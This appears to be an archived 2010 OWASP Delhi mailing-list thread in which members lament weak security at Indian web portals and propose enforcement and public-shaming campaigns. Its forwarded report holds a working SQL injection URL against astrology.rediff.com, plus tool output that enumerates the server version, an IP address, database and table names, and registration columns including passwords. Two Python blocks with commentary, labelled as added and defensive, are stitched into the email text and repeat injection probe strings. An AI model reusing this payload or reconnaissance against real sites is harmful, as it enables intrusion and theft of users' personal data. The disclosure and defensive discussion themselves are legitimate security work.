[Owasp-delhi] Rediff Astrology

Ashish Saxena ashish at aksitservices.co.in
Wed Jun 16 05:52:23 EDT 2010


CERT-In has a charter to send advisories for improving national cyber
security. The organization also monitors attacks on web applications and
networks, including malware attacks.

 

We should write to CERT-In for the issuance of the necessary guidelines and
enforcement of security measures.

 

Best wishes

 

Ashish

 

From: owasp-delhi-bounces at lists.owasp.org
[mailto:owasp-delhi-bounces at lists.owasp.org] On Behalf Of Lakshmanan, Sriram
Sent: Wednesday, June 16, 2010 1:51 PM
To: dhruv.soi at owasp.org; Subhash Dutta; Sripathi Krishnan
Cc: owasp-delhi
Subject: Re: [Owasp-delhi] Rediff Astrology

 

I don't know if it can happen under the aegis of OWASP or not but maybe we
need something like a Jagorey campaign and a "fall of shame". I'm banking on
this group's collective wisdom to do something...

*	The Jagorey like campaign is for the CxO forums who are often unaware
of the problem in their own backyard as the tech manager never notified them
or didn't give them enough gyan (specially to CTO/CISO). Maybe leverage
NASSCOM for such forums (for contact points)
*	The fall of shame is for sites we identify as "bad" or weak thru
non-intrusive testing and advise the public about the risks if the weakness
still exists after notification to the company. I understand such a list
opens up more hacks/attacks, and thus we can refrain from displaying the
vulnerable url and details on the attack. CERT-in may be leveraged for this.
I also do not know the complete legal interpretation of such a move (which
may include defamation suits)

The point I'm trying to make is we know we have issues, with corporate
indifference to security, with laws that are not enforced well, with
"security people" just doing what I call "khanapoorti" i.e. action for the
sake of it. The problems will not go away. As a responsible community can
we create a task force and collectively do something? I do understand the
individual efforts like Nilesh's / Sripathi's or Subhash's and others have
fallen on deaf ears and it is frustrating....maybe concerted and joint efforts
will bear fruit.

 

Additional thoughts/comments/feedback...

 

PS: I use "Jagorey like" as a reference, as the Jagorey campaign is a TV advt
showing a movement against corruption.

 

warm regards,

Sriram

SEC_R_TY. U & I are in it together. Everyone's responsible - Everywhere

 

 

  _____  

From: owasp-delhi-bounces at lists.owasp.org
[mailto:owasp-delhi-bounces at lists.owasp.org] On Behalf Of Soi, Dhruv
Sent: Wednesday, June 16, 2010 12:44 PM
To: 'Subhash Dutta'; 'Sripathi Krishnan'
Cc: 'owasp-delhi'
Subject: Re: [Owasp-delhi] Rediff Astrology

Old saying and a song - "It happens only in India". Till the time laws
aren't enforced with force, no one is bothered about security. Even laws
can be bypassed here, but at least a few would be trapped to set the example
for others.

 

When I explain India InfoSec to friends abroad, I generally blame the
Indian mindset. Bike riders here don't care about their personal security
and wear helmets only when there is strict police checking. It is the same
with car drivers and their seat belts. In Delhi, we find better police checking
so people are serious, but in other areas like Noida, no one cares. In a
nutshell, only strict laws can help Corporate India to be secure and deliver
secure.

 

 

From: owasp-delhi-bounces at lists.owasp.org
[mailto:owasp-delhi-bounces at lists.owasp.org] On Behalf Of Subhash Dutta
Sent: 16 June 2010 09:09
To: Sripathi Krishnan
Cc: owasp-delhi
Subject: Re: [Owasp-delhi] Rediff Astrology

 

Yes, I have also noted the same. In fact, the imint card company stores
passwords reversibly encrypted and will tell you in plain text what your
password is in case you have forgotten it ;).  When brought to their notice,
I received a standard reply - "Thanks for contacting us, we will get back
to you shortly."  Nobody has got back till date (1 year past).  I think
strong legislative punitive measures are the only solution.

Regards

Subhash Dutta
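Subhash's point about reversible password storage is worth making concrete. The Python below is an added example, not code from this thread or from the card company he mentions: a toy reversible scheme (XOR with a fixed key, constructed here) sits next to salted PBKDF2 hashing, showing that the first lets anyone holding the key and the table recover every password, while the second only supports verification and forces a "forgot password" flow to issue a reset token instead of mailing the old password back. The key, iteration count, user names and passwords are all constructed.

```python
# Added example (not from the thread): reversible password storage next to a
# one-way salted hash. Only the standard library is used; the key, iteration
# count and passwords are constructed for illustration.
import base64
import hashlib
import hmac
import itertools
import os

# --- what the card company apparently does: reversible storage -------------
TOY_KEY = b"constructed-site-key"  # constructed; a real key would sit in config


def store_reversible(password: str) -> str:
    """Toy reversible scheme: XOR with a repeating key, then base64."""
    raw = bytes(b ^ k for b, k in zip(password.encode(), itertools.cycle(TOY_KEY)))
    return base64.b64encode(raw).decode()


def recover_plaintext(stored: str) -> str:
    """Anyone holding the key and the table (support staff, or an attacker who
    dumped the database) gets every password back. This is exactly the
    capability that lets a company tell you your forgotten password."""
    raw = base64.b64decode(stored)
    return bytes(b ^ k for b, k in zip(raw, itertools.cycle(TOY_KEY))).decode()


# --- what it should do: salted, iterated one-way hash ----------------------
ITERATIONS = 600_000  # constructed choice; tune to the verifier's hardware


def hash_password(password: str) -> str:
    """Fresh random salt per user, so equal passwords give different records."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (
        ITERATIONS,
        base64.b64encode(salt).decode(),
        base64.b64encode(digest).decode(),
    )


def verify_password(password: str, stored: str) -> bool:
    """The only operation a verifier needs: recompute and compare in constant
    time. There is no recover_plaintext counterpart for this format."""
    algo, iters, salt_b64, digest_b64 = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), base64.b64decode(salt_b64), int(iters)
    )
    return hmac.compare_digest(digest, base64.b64decode(digest_b64))


def forgot_password_token() -> str:
    """With one-way storage a "forgot password" flow cannot reveal the old
    password; it issues a short-lived random reset token instead (24 random
    bytes, URL-safe base64, padding stripped)."""
    return base64.urlsafe_b64encode(os.urandom(24)).decode().rstrip("=")


if __name__ == "__main__":
    record = hash_password("constructed-pass-1")
    print("stored:", record)
    print("verify correct:", verify_password("constructed-pass-1", record))
    print("verify wrong:  ", verify_password("constructed-pass-2", record))
    print("reset token:   ", forgot_password_token())
```

The reversible pair exists only to show the failure mode: whatever cipher replaces the toy XOR, the key has to be available to the application, so a database dump plus a configuration file yields plaintext for every customer.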


----- Original Message -----
From: "Sripathi Krishnan" <sripathi.krishnan at gmail.com>
To: "dhruv soi" <dhruv.soi at owasp.org>
Cc: owasp-delhi at lists.owasp.org, owasp-mumbai at lists.owasp.org,
owasp-bangalore at lists.owasp.org
Sent: Monday, June 14, 2010 11:25:23 PM GMT +05:30 Chennai, Kolkata, Mumbai,
New Delhi
Subject: Re: [Owasp-delhi] Rediff Astrology

It's not just rediff.com; almost all other Indian portals - in.com,
indiatimes.com and sify.com - have similar problems. XSS, XSRF, SQL Injection,
poor password/session management, open redirects .. the list is endless. 

 

I have written to each of the above portals several times in the past year,
and have given up. IMHO, they are not interested in securing their websites.

 

--Sri

On 14 June 2010 23:17, Soi, Dhruv <dhruv.soi at owasp.org> wrote:

Another one to notify Rediff that readers' daily fortune can be fixed by
someone. Seems Rediff needs a lot of OWASP, do inform them that it's free!!

 

From: "Jack H4xor" 
Sent: 14 June 2010 12:07
To: dhruv.soi at owasp.org
Subject: Rediff Astrology

 

y0,


h0rr1bl3 th4n h0rr0r

Vulnerable Url : 

http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzodiac=Scorpiox%27%20OR%201=convert%28int,@@version%29--

********************************************************************
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+     -==  MSSQL Information Schema astrology.rediff.com  ==-     +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[ + ] URL : http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzodiac=Scorpiox'
[ + ] Date: Tue May 18 20:58:26 2010
[ + ] Displaying information about MSSQL host !

[ + ] @@VERSION  :      Microsoft SQL Server  2000 - 8.00.194 (Intel X86)
                        Aug  6 2000 00:57:48
                        Copyright (c) 1988-2000 Microsoft Corporation
                        Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

[ + ] USER ()          : dbo
[ + ] S_USER ()        : astrology
[ + ] DB_NAME ()       : astro
[ + ] HOST_NAME ()     : ASTROLOGY
[ + ] SERVER_NAME ()   : SEARCHDB
[ + ] SERVER_TYPE ()   : Microsoft-IIS/6.0
[ + ] X-POWERED-By ()  : ASP.NET

[ + ] IP_ADDRESS_INFO  : 202.54.124.173

[ - ] We Can't get number of Databases !

[ ! ] Start dumping database Names !

[ ? ] But first choice number of DB to dump :> 20

[ + ] Displaying list of 20 databases on this MSSQL host !

[ DATABASE: 0 ]        : astro
[ DATABASE: 1 ]        : master
[ DATABASE: 2 ]        : tempdb
[ DATABASE: 3 ]        : model
[ DATABASE: 4 ]        : msdb
[ DATABASE: 5 ]        : pubs
[ DATABASE: 6 ]        : Northwind
[ DATABASE: 7 ]        : travel
[ DATABASE: 8 ]        : travel_int
[ DATABASE: 9 ]        : astro
[ DATABASE: 10 ]        : Jobsearch
[ DATABASE: 11 ]        : astroyogiD
[ DATABASE: 12 ]        : matrimonial
[ DATABASE: 13 ]        : investornew
[ DATABASE: 14 ]        : test

[ ! ] Vulnerability Database is   :  astro

[ + ] Displaying Tables inside DB :> astro

[ ? ] Numbers of Tables To Dispaly ?
[ + ] Specify Numbers   :> 200

[ TABLES: 0 ]          : ALLIANCE_PARTNER_COMMISSION
[ TABLES: 1 ]          : ALLIANCE_PARTNER_MASTER
[ TABLES: 2 ]          : astrolove
[ TABLES: 3 ]          : astroparent
[ TABLES: 4 ]          : CITY
[ TABLES: 5 ]          : COMPLETE_ORDER_DETAIL
[ TABLES: 6 ]          : COMPLETE_SUBSCRIPTION_DETAIL
[ TABLES: 7 ]          : COUNTRY
[ TABLES: 8 ]          : CUSTOMER_CARE_DETAILS
[ TABLES: 9 ]          : CUSTOMER_CARE_MASTER
[ TABLES: 10 ]          : CUSTOMER_PERSON1
[ TABLES: 11 ]          : CUSTOMER_PERSON2
[ TABLES: 12 ]          : CUSTOMER_PERSON3
[ TABLES: 13 ]          : darshtest
[ TABLES: 14 ]          : dtproperties
[ TABLES: 15 ]          : FENGSHUI
[ TABLES: 16 ]          : FRANCHISEE_MASTER
[ TABLES: 17 ]          : idealmate
[ TABLES: 18 ]          : INTERNATIONAL_PARTNER_MASTER
[ TABLES: 19 ]          : NUMEROLOGY
[ TABLES: 20 ]          : ORDER_DETAILS
[ TABLES: 21 ]          : ORDER_MASTER
[ TABLES: 22 ]          : ORDER_REMARKS
[ TABLES: 23 ]          : ORDERS
[ TABLES: 24 ]          : p1
[ TABLES: 25 ]          : p3master
[ TABLES: 26 ]          : PALMISTRY
[ TABLES: 27 ]          : PAYMENT_METHOD_MASTER
[ TABLES: 28 ]          : PROBLEM_ANSWER
[ TABLES: 29 ]          : PROBLEM_CATEGORY
[ TABLES: 30 ]          : REGISTRATION
[ TABLES: 31 ]          : SHIPPING_DETAILS
[ TABLES: 32 ]          : SPCFIC_ANLYS
[ TABLES: 33 ]          : SUBSCRIBER_DETAILS
[ TABLES: 34 ]          : SUBSCRIBER_MASTER
[ TABLES: 35 ]          : SUBSCRIBER_REGISTRATION
[ TABLES: 36 ]          : SUBSCRIBER_TRANSACTION
[ TABLES: 37 ]          : SUBSCRIPTION_DETAILS
[ TABLES: 38 ]          : SUBSCRIPTION_MASTER
[ TABLES: 39 ]          : sysconstraints
[ TABLES: 40 ]          : syssegments
[ TABLES: 41 ]          : test
[ TABLES: 42 ]          : USER_ASTROLOGER_PRODUCT_TRANSACTION
[ TABLES: 43 ]          : zodiac

[ + ] Done !

[ + ] Start dumping all Columns from table :> REGISTRATION

[ ? ] Numbers of Columns To Display ?
[ + ] Specify Numbers    :> 50

[ + ] Displaying 50 Columns inside Table: REGISTRATION and Database: astro

[ COLUMNS : REGISTRATION ] 0 ]         : FRANCHISEE_ID
[ COLUMNS : REGISTRATION ] 1 ]         : PARTNER_ID
[ COLUMNS : REGISTRATION ] 2 ]         : REGISTRATION_ADDRESS
[ COLUMNS : REGISTRATION ] 3 ]         : REGISTRATION_BIRTH_COUNTRY
[ COLUMNS : REGISTRATION ] 4 ]         : REGISTRATION_BIRTH_DATE
[ COLUMNS : REGISTRATION ] 5 ]         : REGISTRATION_BIRTH_PLACE
[ COLUMNS : REGISTRATION ] 6 ]         : REGISTRATION_BIRTH_TIME_HOUR
[ COLUMNS : REGISTRATION ] 7 ]         : REGISTRATION_BIRTH_TIME_MINUTES
[ COLUMNS : REGISTRATION ] 8 ]         : REGISTRATION_CELL_NO
[ COLUMNS : REGISTRATION ] 9 ]         : REGISTRATION_COUNTRY
[ COLUMNS : REGISTRATION ] 10 ]         : REGISTRATION_DATE
[ COLUMNS : REGISTRATION ] 11 ]         : REGISTRATION_EMAIL_ID
[ COLUMNS : REGISTRATION ] 12 ]         : REGISTRATION_FIRSTNAME
[ COLUMNS : REGISTRATION ] 13 ]         : REGISTRATION_GENDER
[ COLUMNS : REGISTRATION ] 14 ]         : REGISTRATION_ID
[ COLUMNS : REGISTRATION ] 15 ]         : REGISTRATION_IP
[ COLUMNS : REGISTRATION ] 16 ]         : REGISTRATION_LASTNAME
[ COLUMNS : REGISTRATION ] 17 ]         : REGISTRATION_PASSWORD
[ COLUMNS : REGISTRATION ] 18 ]         : REGISTRATION_TELEPHONE_NO
[ COLUMNS : REGISTRATION ] 19 ]         : REGISTRATION_USERNAME

[ ! ] Done !

[ ! ] All information was recorded in astrology.rediff.com.txt file !

[ 1 ] : Return to Tables  !
[ 2 ] : Return to Columns !

[ ? ] : Oprion :>

Thanks & Regards

Jackh4xor

( h4cky0u )


_______________________________________________
Owasp-delhi mailing list
Owasp-delhi at lists.owasp.org
https://lists.owasp.org/mailman/listinfo/owasp-delhi
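The query string in the URL quoted above is a textbook error-based SQL injection: a single quote closes the string literal the ASP page built around pzodiac, and the database's own error message carries @@version back to the browser. The dump also shows the application connecting as dbo, so one injectable parameter exposed every table on the host; a least-privilege database login would have limited what the flaw could reach. As an added example that is not part of the thread and not code from the site, the Python below uses sqlite3 in place of SQL Server to show the vulnerable concatenation beside a parameterised query, the error text the vulnerable form leaks, and a log-side check that flags a pzodiac value carrying SQL syntax. The table name, rows and query shape are assumptions.

```python
# Added example (not from the thread or from the site discussed): string-built
# SQL beside a parameterised query, the error leak that makes error-based
# injection work, and a detection check for the query string. sqlite3 stands
# in for SQL Server; the table, rows and query shape are assumptions.
import sqlite3
from urllib.parse import parse_qs

# Constructed sample data standing in for the site's astroparent table.
SAMPLE_ROWS = [
    ("Scorpio", "constructed advice for Scorpio"),
    ("Leo", "constructed advice for Leo"),
    ("Aries", "constructed advice for Aries"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE astroparent (pzodiac TEXT, advice TEXT)")
    conn.executemany("INSERT INTO astroparent VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_concat(conn, pzodiac):
    """Vulnerable: the classic-ASP habit of gluing the request value into the
    SQL text. A quote in the value ends the literal; what follows is SQL."""
    sql = "SELECT advice FROM astroparent WHERE pzodiac = '" + pzodiac + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_param(conn, pzodiac):
    """Hardened: the value is bound as a parameter, so quotes, OR and comment
    markers are compared as data and never parsed as SQL."""
    sql = "SELECT advice FROM astroparent WHERE pzodiac = ?"
    return [row[0] for row in conn.execute(sql, (pzodiac,))]


def error_leak(conn, pzodiac):
    """Return the database error text the vulnerable query produces, or None.
    Error-based injection depends on this text reaching the browser, so the
    fix is parameterisation plus a generic error page, not one or the other."""
    try:
        lookup_concat(conn, pzodiac)
    except sqlite3.Error as exc:
        return str(exc)
    return None


def suspicious_pzodiac(query_string):
    """Detection side: flag a logged query string whose pzodiac value carries
    anything but letters. Zodiac names are alphabetic, so a quote, space or
    operator is either noise or an attempt. parse_qs decodes %27-style
    escapes first, so encoding does not hide the quote."""
    values = parse_qs(query_string).get("pzodiac", [])
    return any(not v.isalpha() for v in values)


if __name__ == "__main__":
    db = make_db()
    probe = "Scorpiox' OR 1=1--"
    print("concat rows for probe:", len(lookup_concat(db, probe)))
    print("param  rows for probe:", len(lookup_param(db, probe)))
    print("error leaked:", error_leak(db, "Scorpiox' OR 1=convert(int,@@version)--"))
    print("flagged:", suspicious_pzodiac("pzodiac=Scorpiox%27%20OR%201=1--"))
```

Under concatenation the probe value returns every row because the comparison becomes `pzodiac = 'Scorpiox' OR 1=1` with the trailing quote commented out; under the bound parameter the same value matches nothing. The allow-list check is the cheap signal a web log review can run retroactively over requests to the affected page.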

 






This e-mail, including attachments, may include confidential and/or
proprietary information, and may be used only by the person or entity
to which it is addressed. If the reader of this e-mail is not the intended
recipient or his or her authorized agent, the reader is hereby notified
that any dissemination, distribution or copying of this e-mail is
prohibited. If you have received this e-mail in error, please notify the
sender by replying to this message and delete this e-mail immediately.